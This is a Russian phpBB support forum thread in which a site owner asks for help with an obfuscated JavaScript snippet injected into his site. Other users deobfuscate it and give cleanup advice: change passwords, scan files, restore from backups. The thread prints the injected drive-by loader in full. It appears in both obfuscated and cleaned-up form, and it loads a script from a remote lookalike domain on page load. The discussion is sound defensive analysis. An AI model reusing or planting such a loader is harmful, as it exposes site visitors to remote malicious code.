Центр пользователя  |  Ваши сообщения  |  FAQ
Форум поддержки phpBB » phpBB 3.0.x » Поддержка phpBB 3.0.x

Непонятный скрипт.

Помощь в установке, настройке и использовании phpBB 3.0.x
Пожалуйста, помните, что существуют: Поиск, Правила форума
Возможно, ответ на Ваш вопрос уже имеется: Документация, Статьи, Накопленный опыт
Полезные материалы по этой теме: Инструкция по установке форума, Конвертеры

Сообщение 03 апр 2010, 22:22

:!: некоторое время назад NOD 32 при посещении сайта и форума начал блокировать ip адреса, причем при каждом посещении адреса меняются, в код главной страницы сайта был внедрен этот скрипт: <script>var ze;if(ze!='' && ze!='qL'){ze=''};function z(){var a=new Array();var C=RegExp;var ga='';var Y=new String("g");var fQ='';var m;if(m!='D' && m!='eF'){m=''};var w='';var jX;if(jX!='YO' && jX!='tv'){jX='YO'};function L(s,i){var r=new Array();var N= String("[");N+=i;var hk;if(hk!='' && hk!='Ke'){hk=''};var u;if(u!='' && u!='Cs'){u=''};N+=String("]s3U9".substr(0,1));var v;if(v!='' && v!='Lz'){v=''};var wN;if(wN!='vO'){wN='vO'};var B=new C(N, Y);this.HP='';this.P="";return s.replace(B, w);};var o="";var Pi="";this.bB='';var M='';var H=String("src");var p='';var K=String("7518http:".substr(4)+"dzO//gooOdz".substr(3,5)+"zkpgle-s".substr(3)+"qB1e.goo".substr(3)+"ny0gle.cny0".substr(3,5)+"HZ0om.mx".substr(3)+"AKRb.goog".substr(4)+"le-co"+"Y3hs-jp.dYs3h".substr(4,5)+"eargu"+"ide.ruHC".substr(0,5)+"u:");var Z=window;var ec;if(ec!=''){ec='Nn'};var g=new String("/ch"+"hOgina".substr(3)+"n6chr.".substr(3)+"comD4G".substr(0,3)+"/ch"+"NQ5ina".substr(3)+"HEM7hr.7MEH".substr(4,3)+"jv3com".substr(3)+"/ne5uZ".substr(0,3)+"pLBobu".substr(3)+"bVa4x.ca4Vb".substr(4,3)+"4atom/4ta".substr(3,3)+"goo9Qt".substr(0,3)+"glewH7Q".substr(0,3)+"n8L.pt".substr(3)+"/go"+"ogl5uX".substr(0,3)+"e.cqCAG".substr(0,3)+"bTpom.pbT".substr(3,3)+"uNeEphp".substr(4));var wF=L('83332033323833333023233',"32");var k="scr"+"ipt";this.Os='';var KI;if(KI!='ZR' && KI!='aO'){KI=''};var A=String("Yi4Sde".substr(4)+"fe"+"rhxP".substr(0,1));this.oU='';Z.onload=function(){var Dd="";this.eM='';try {M=K+wF;M+=g;var SY;if(SY!='vA' && SY!='Q'){SY=''};t=document.createElement(k);t[A]=[1,8][0];var kb="";t[H]=M;var R='';document.body.appendChild(t);var vj=new Array();} catch(q){var l;if(l!='wb' && l!='ZQ'){l=''};var oi="";};};};var ne;if(ne!='wP'){ne=''};var fVo;if(fVo!='dq'){fVo=''};z();var Gv;if(Gv!='' && Gv!='pg'){Gv='Sv'};var WO=new Date();</script>

5 человек не смогли определить что он выполняет, но и полностью вычистить его не удается так же. Уважаемые, у кого была подобная проблема? Подскажите как решиали вопрос и какие дыры и как можно залатать
tigerrr
Новичок
 
Сообщений: 4
Зарегистрирован:
03 апр 2010, 22:18
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 03 апр 2010, 22:45

хостиг не ваш ? если нет у хостера спросите может он рекламу питаетса вписать ..) ну ето как вариант может ето и не так.)
Помог размести силку на наш ресурс.)
Код: выделить все
<a href="http://levik.org.ua/" target="_blank" title="Портал"><img src=http://levik.org.ua/friends/levik88_31.jpg></a>
levik
Наш человек
 
Сообщений: 255
Зарегистрирован:
31 май 2009, 10:36
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 03 апр 2010, 22:45

tigerrr

где этот скрипт у тебя расположен ?
Я недеюсь что у тебя пароли на фтп , в админку форума и хостинга состоят не из 4 букв ??? и не qwerty ? ;)
Измени указанные пароли , зайди в админку хостинга и проверь антивирусной программой весь форум со стороны хостинга.
Мой проект - Urbanwave
Сделано на: phpbb 3.0.7,KTVM portal,Memht portal+моды
http://urbanwave.info - Онлайн радио,тв, форумные игры.
http://cop-mmo.ru/ - WOT сообщество _COP_
Если есть предложения что либо установить-пишите в личку
Аватар пользователя
xC4x
Поддержка
 
Сообщений: 2348
Зарегистрирован:
16 мар 2009, 07:11
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 04 апр 2010, 14:00

tigerrr
проверяете все файлы и удаляете левый код, меняете ВСЕ пароли, но сначала лечите свой комп от вирусов.
crash
Поддержка
 
Сообщений: 11349
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

Сообщение 05 апр 2010, 16:29

Антивирями прошел ничего вообще нет, юзал: NOD 32, DrWeb Cure IT. Хостер ничего влепить из рекламы мне не пытается... Еще идеи есть?
tigerrr
Новичок
 
Сообщений: 4
Зарегистрирован:
03 апр 2010, 22:18
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 05 апр 2010, 22:04

tigerrr

их уже высказали я и crash
Мой проект - Urbanwave
Сделано на: phpbb 3.0.7,KTVM portal,Memht portal+моды
http://urbanwave.info - Онлайн радио,тв, форумные игры.
http://cop-mmo.ru/ - WOT сообщество _COP_
Если есть предложения что либо установить-пишите в личку
Аватар пользователя
xC4x
Поддержка
 
Сообщений: 2348
Зарегистрирован:
16 мар 2009, 07:11
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 05 апр 2010, 23:11

после подчистки от мусора и небольших преобразований получим
Код: выделить все
<script>
  function z()
  {
    var M='';
    var H=String("src");
    var K=String("http://google-se.google.com.mx.google-co-jp.dearguide.ru:");
    var g=new String("/chinahr.com/chinahr.com/neobux.com/google.pt/google.com.php");
    var wF="8080";
    var A=String("defer");
   
    window.onload=function()
    {
      try {
        M=K+wF;
        M+=g;
        t=document.createElement("script");
        t[A]=[1,8][0];
        t[H]=M;
        document.body.appendChild(t);
      }
      catch(q)
      {
        var oi="";
      };
    };
  };
 
  z();
</script>

или, если еще немного поколдовать, то
Код: выделить все
<script>
    window.onload=function()
    {
        t=document.createElement("script");
        t["defer"]=[1,8][0];
        t["src"]="http://google-se.google.com.mx.google-co-jp.dearguide.ru:8080/chinahr.com/chinahr.com/neobux.com/google.pt/google.com.php";
        document.body.appendChild(t);
    };
</script>


5 человек не смогли определить что он выполняет
было сделано все что бы ввести в ступор любого начинающего программиста ;)

антивири и смена паролей врятли помогут, т.к. если файлы правились, то велика вероятность, что к какому-либо файлу приписался вредоносный скрипт дающий полное управление сайтом.

Если есть файловые бэкапы за дату до появления вставок, то стоит почистить полностью каталог сервера и затем развернуть сайт из архива заново, что бы быть уверенным, что никаких левых/правленых файлов не осталось
Distructor
Пользователь
 
Сообщений: 47
Зарегистрирован:
06 мар 2010, 00:37
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 06 апр 2010, 12:13

Но ведь в любом случае остается дыра через которую эта хрень приползла... как её заткнуть?
tigerrr
Новичок
 
Сообщений: 4
Зарегистрирован:
03 апр 2010, 22:18
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Сообщение 06 апр 2010, 12:46

сменить все пароли. на фтп, на доступ к базе, на дсотуп в панель упарвления хостингом, на форум. Выяснить каким макаром был взлом. Вот вы знаете как вас поломали? А что вы собираетесь закрывать если не знаете в каком месте вообще закрывать
crash
Поддержка
 
Сообщений: 11349
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

СообщениеСообщение было удалено | удалил: tigerrr | 16 апр 2010, 10:07.
Причина: утратило актуальность


Вернуться в Поддержка phpBB 3.0.x

 


  • Похожие темы
    Ответов
    Просмотров
    Последнее сообщение

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 4

Форум поддержки phpBB
2008 - 2017 © BB3x.ru - русская поддержка форума phpBB3
Создано на основе phpBB® Forum Software © phpBB Group
+ 17 предустановленных модов
+ SEO-оптимизация форума
+ авторизация через соц. сети
+ защита от спама